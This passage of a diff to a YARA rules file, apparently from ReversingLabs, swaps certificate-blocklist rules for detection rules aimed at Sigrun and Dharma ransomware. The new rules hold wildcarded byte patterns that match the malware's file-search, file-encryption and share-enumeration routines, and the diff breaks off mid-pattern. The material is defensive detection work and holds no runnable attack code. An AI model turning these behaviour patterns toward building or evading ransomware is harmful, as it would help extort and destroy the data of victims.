+            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 83 C4 ?? 89 74 24 ?? 33
+        }
+		$find_volumes_p2 = {
+            FF 8B 5C BC ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 9C B4 ?? ?? ?? ?? 46 47 83 FF
+            ?? 7C ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 57 FF 15 ??
+            ?? ?? ?? 8B D8 0F 1F 00 85 F6 74 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 57
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74
+            ?? 4E 57 FF B4 B4 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF
+            D7 33 D2 B9 ?? ?? ?? ?? F7 F1 68 ?? ?? ?? ?? 80 C2 ?? 88 94 34 ?? ?? ?? ?? FF D3 46
+            83 FE ?? 7C ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 15
+        }
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
+            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ??
+            8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ??
+            8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57
+            57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ??
+            ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8
+            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ??
+            3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D
+        }
+		$find_files_p2 = {
+            56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ??
+            ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D
+            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ??
+            75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ??
+            ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2
+            C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
+            ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sony Pictures Entertainment Inc." and pe.signatures [ i ] . serial == "01:e2:b4:f7:59:81:1c:64:37:9f:ca:0b:e7:6d:2d:ce" and 1417651200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_volumes_p* ) ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_03E5A010B05C9287F823C2585F547B80 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sigrun : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sigrun ransomware."
 		author = "ReversingLabs"
-		id = "14ad79c7-f669-59a6-94d1-978a13fbb337"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "fa627192-ed80-5115-a028-014f67f4571d"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1126-L1142"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sigrun.yara#L1-L111"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1d57b640ee313ad4d53dc64ce4df3e4ed57976e7750cfd80d62bf9982d964d26"
+		logic_hash = "ea29ec64cdfc0c714fe0acdce5878cb1302dd5aa916811121c644948ce275935"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sigrun"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 57 8B DA C7 44 24 ?? ?? ?? ??
+            ?? 8B F1 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 89 7C 24 ?? 85 C0 75 ?? 85 FF
+            75 ?? 5F 5E 5B 8B E5 5D C3 C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ??
+            A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ?? 89 44 24 ?? 0F B7 06 66 89 44 24 ?? 83 F8
+            ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56
+            FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF D7 8D
+            44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75
+            ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 8D 44 24 ?? 50 56 FF D7 F6 44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ??
+            8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ??
+            ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54
+            24 ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74
+            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E
+            33 C0 5B 8B E5 5D C3
+        }
+		$encrypt_files_1 = {
+            55 8B EC 83 EC ?? 53 57 68 ?? ?? ?? ?? 8B FA 8B D9 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 33 C0 5B 8B E5 5D C3
+            56 8D 45 ?? 33 F6 50 56 56 57 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ??
+            C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 68 ??
+            ?? ?? ?? 50 FF 75 ?? C7 00 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0
+            FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 5E 5F 5B 8B E5 5D C3
+        }
+		$encrypt_files_2 = {
+            55 8B EC 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B DA 8B F9 FF 15 ?? ??
+            ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CF E8 ?? ?? ?? ?? 85
+            C0 74 ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 5D C3 8B CF E8 ??
+            ?? ?? ?? 85 C0 75 ?? 83 7B ?? ?? 72 ?? 8B 55 ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 56
+            57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ??
+            5B 5D C3
+        }
+		$encrypt_files_3 = {
+            55 8B EC 83 EC ?? 56 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? 5F 5E 8B E5 5D C3 8D 45
+            ?? 50 8D 45 ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 8D 4D ?? 8B D7 E8
+            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 74 ??
+            C6 04 08 ?? 8B 4D ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75
+            ?? FF D6 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ??
+            57 FF D6 5F 33 C0 5E 8B E5 5D C3
+        }
+		$enum_resources_1 = {
+            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B F1 6A ?? 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 6A ?? 89 54 24 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF D7 8B 1D ?? ??
+            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 85 F6 0F 85 ?? ??
+            ?? ?? 8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF D3 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF
+            74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 49 ?? 33 DB 39 5C 24 ?? 0F 86
+            ?? ?? ?? ?? 8B 74 24 ?? 83 C6 ?? 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
+            6A ?? 57 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ??
+            8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8D 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF
+        }
+		$enum_resources_2 = {
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 74 24 ?? FF 74 24 ?? FF
+            15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF D3 8B F0 85 F6 0F 85 ?? ?? ??
+            ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ??
+            33 DB 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 83 C6 ?? 90 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ??
+            ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ?? 8D
+            4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8B 74
+            24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
+            50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 74 24
+            ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 8B
+            C6 5E 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MOCOMSYS INC" and pe.signatures [ i ] . serial == "03:e5:a0:10:b0:5c:92:87:f8:23:c2:58:5f:54:7b:80" and 1385423999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_* ) ) and ( $find_files ) and ( all of ( $encrypt_files_* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Fe7Df6C4B9A33B83D04E23E98A77Cce : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dharma : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Dharma ransomware."
 		author = "ReversingLabs"
-		id = "47a10658-c5c4-58b6-b154-7babcfbc50a2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8157b20b-717c-581f-83c1-5fc8d2312238"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1144-L1160"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Dharma.yara#L1-L108"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "da5ed07def8d0c04ea58aacd90f9fa5588f868f6d0057b9148587f2f0b381f25"
+		logic_hash = "6f33281523b462aaff68bb04f2f6869c3e6cd60cd9306ed80bb0c3e3b699f315"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Dharma"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$file_search = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
+            8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 8B 55
+            ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ??
+            75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 8B
+            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B
+            55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D
+            ?? ?? 75 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52
+            8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 8B E5 5D C3
+        }
+		$file_encrypt_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 4D ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 8B 45 ?? 2B C2 83 E8 ?? 89 45 ?? 8B
+            4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ??
+            ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 05 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ??
+            ?? ?? 8B 4D ?? 83 E1 ?? 74 ?? 8B 55 ?? 83 E2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 89 85 ?? ?? ??
+            ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D
+            ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ??
+            83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51
+            E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D
+            ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B
+            55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83 7D
+            ?? ?? 75 ?? 8B 4D ?? 3B 4D ?? 73 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 B8 ?? ?? ??
+            ?? 2B C2 89 45 ?? 8B 4D ?? 03 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 03 45 ?? 50 8B 4D ?? 51
+        }
+		$file_encrypt_2 = {
+            8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 45 ?? 39 85 ?? ?? ?? ??
+            74 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 95 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ??
+            ?? 83 7D ?? ?? 74 ?? 8B 8D ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50
+            8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89
+            45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45
+            ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45 ??
+            6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89
+            45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45
+            ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 05 ?? ??
+            ?? ?? 89 45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0
+            ?? 89 45 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 2B 55 ?? 52 8B 45 ?? 50 8B 8D ?? ??
+            ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 2B 55 ?? 39 95 ?? ?? ?? ?? 74 ?? EB ??
+            EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? E9 ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ??
+            ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ??
+            8B 55 ?? 52 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ??
+            ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$enum_shares = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ??
+            50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 E8 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45
+            ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75
+            ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ??
